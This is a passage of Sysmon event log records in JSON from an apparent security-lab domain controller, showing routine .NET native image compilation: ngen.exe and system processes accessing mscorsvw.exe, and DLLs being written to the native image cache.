C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00109A751000}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:08.490\r\nProcessGuid: {41C8662E-22AB-5F25-0000-00109A751000}\r\nProcessId: 3884\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f2c-0\\System.Web.Extensions.Design.dll\r\nCreationUtcTime: 2020-08-01 08:07:08.490","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:08.490","ProcessGuid":"{41C8662E-22AB-5F25-0000-00109A751000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f2c-0\\System.Web.Extensions.Design.dll","CreationUtcTime":"2020-08-01 08:07:08.490","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.537\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AC-5F25-0000-0010C17A1000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.537","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AC-5F25-0000-0010C17A1000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AC-5F25-0000-0010C17A1000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AC-5F25-0000-0010C17A1000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.553\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AC-5F25-0000-0010C17A1000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.553","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AC-5F25-0000-0010C17A1000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.709\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00107E470F00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.709","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00107E470F00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.709\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00107E470F00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.709","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00107E470F00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:08.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00107E470F00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:08.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00107E470F00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:10.178\r\nProcessGuid: {41C8662E-22AC-5F25-0000-00109E7E1000}\r\nProcessId: 2608\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\System.Web.Mobile.dll\r\nCreationUtcTime: 2020-08-01 08:07:10.178","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:10.178","ProcessGuid":"{41C8662E-22AC-5F25-0000-00109E7E1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\System.Web.Mobile.dll","CreationUtcTime":"2020-08-01 08:07:10.178","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.256\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010C0831000}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v